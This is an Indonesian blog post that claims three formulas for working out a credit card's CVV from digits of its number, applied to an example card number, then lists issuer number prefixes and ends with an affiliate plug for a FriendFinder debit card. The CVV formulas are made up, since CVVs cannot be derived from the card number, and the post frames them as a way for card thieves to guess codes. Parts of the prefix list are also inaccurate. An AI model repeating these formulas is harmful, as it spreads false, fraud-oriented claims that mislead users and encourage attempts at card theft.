    5378-5432-1011-8224 KETERANGAN : Perlu Anda ketahui bahwa saya hanya mengetikkan 16 digit angka yang asal-asalan saja. Saya tidak mengetahui nama pemilik Kartu Kredit Ini, Tinggalnya dimana, berasal dari Indonesia / Luar Negeri, dan sebagainya. Sekali Lagi, saya hanya asala- salan saja memberi contoh No. Kartu Kredit, karena ini hanyalah sebuah contoh saja.

    Kembali ke CONTOH No. Kartu Kredit tersebut :

    5378-5432-1011-8224

    Cara mengetahui No. CVVnya adalah sebagai berikut : “RUMUS 1” Cari Digit ke 8 : yaitu 2

    Cari Digit ke 12 : yaitu 0

    Cari Digit ke 3 : yaitu 7 (TAMBAHKAN

    DENGAN “1”) , berarti 7 + 1 = 8

    Maka ketahuan CVVnya adalah 208 , hehehe

    … mudah, bukan ? Atau bisa juga dengan rumus yang kedua : “RUMUS 2” Cari Digit ke 7 : yaitu 3

    Cari Digit ke 13 : yaitu 8

    Cari Digit ke 3 : yaitu 7 (TAMBAHKAN

    DENGAN “1”) , berarti 7 + 1 = 8

    Maka ketahuan CVVnya adalah 388 , hehehe

    mudah, bukan ? Atau bisa juga dengan rumus yang ketiga : “RUMUS 3” Cari Digit ke 9 : yaitu 1

    Cari Digit ke 3 : yaitu 7

    Cari Digit ke 6 : yaitu 4 (TAMBAHKAN DENGAN “1”) , berarti 4 + 1 = 5

    Maka ketahuan CVVnya adalah 175 , hehehe … mudah, bukan ?

    Silahkan anda coba sendiri menggunakan KARTU KREDIT ANDA, kebetulan setelah saya iseng-iseng mencoba RUMUS 1, 2 dan 3 dengan menggunakan NOMER KARTU KREDIT yang saya miliki, ternyata CVV Kartu Kredit yang saya miliki

    cocok tuh perhitungannya menggunakan Rumus yang ke 3 !!!

    Tapi anda jangan kuatir, konon rumus ini ketepatannya hanya 95 % saja, jadi masih

    ada kemungkinan 5 % yang meleset.

    Jadi apabila anda mencobanya dengan Kartu

    Kredit Anda, dan setelah anda

    menghitung dan HASILNYA SALAH, maka Beruntunglah Anda !!!

    Saya malah jadi was-was dan deg-degan , karena CVV KARTU KREDIT saya

    TERNYATA DAPAT DITEBAK dengan menggunakan Rumus No. 3 !!!

    Wah, saya jadi harus lebih berhati-hati nich apabila ingin Berbelanja Online, bisa-bisa

    Kartu Kredit Saya nanti dijebol maling…. Wah, mudah-mudahan hal itu jangan

    sampai terjadi deh … Amin. Cara Rahasia Mengetahui apakah suatu

    Kartu Kredit diterbitkan oleh Visa/

    Mastercard/ Amex/ Discover Untuk Tambahan Pengetahuan Anda, maka berikut saya jelaskan mengenai nomer sandi dari masing-masing perusahaan Kartu Kredit. UNTUK MASTERCARD : Angka Awal pada Kartu Kredit adalah 51, 52, 53, 54, 55, 56, dll dengan panjang Nomer Kartu Kredit Antara 14 hingga 16 Digit. UNTUK VISA : Angka Awal pada Kartu Kredit adalah “4”

    dengan panjang Nomer Kartu Kredit adalah

    13 hingga 16 Digit. UNTUK AMERICAN EXPRESS : Angka Awal pada Kartu Kredit adalah “34”

    dengan panjang Nomer Kartu Kredit adalah

    15 Digit. UNTUK DINERS CLUB : Angka Awal pada Kartu Kredit adalah

    300,301,302,303,304,305, dan 38 dengan

    panjang Nomer Kartu Kredit adalah 14 Digit UNTUK JCB : Angka Awal pada Kartu Kredit adalah “3”

    dengan panjang Nomer Kartu Kredit adalah

    16 Digit UNTUK BANKCARD : Angka Awal pada Kartu Kredit adalah “56”

    dengan panjang Nomer Kartu Kredit adalah

    14 Atau 16 Digit UNTUK DISCOVER CARD : Angka Awal pada Kartu Kredit adalah 6011,

    6500 – 6509, 6013 dengan panjang Nomer

    Kartu Kredit adalah 16 Digit. Jika anda ingin mempraktekan atau penasaran ingin mencobanya dengan menggunakan kartu kredit yang asli. Sebuah Perusahaan Afliate yaitu FriendFinder mamberi kemudahan bagi para membernya dengan cara memberi DebetCard untuk memudahkan pencairan uang dari hasil merekrut member untuk daftar di FriendFinder. Baca Tutorialnya DISINI.. Kartunya dari perusahaan MasterCard yang bentuknya DebetCard.
  • Copyright © 2013 - Nisekoi - All Right Reserved

    X ZoneTechno Powered by Blogger - Designed by Johanes Djogan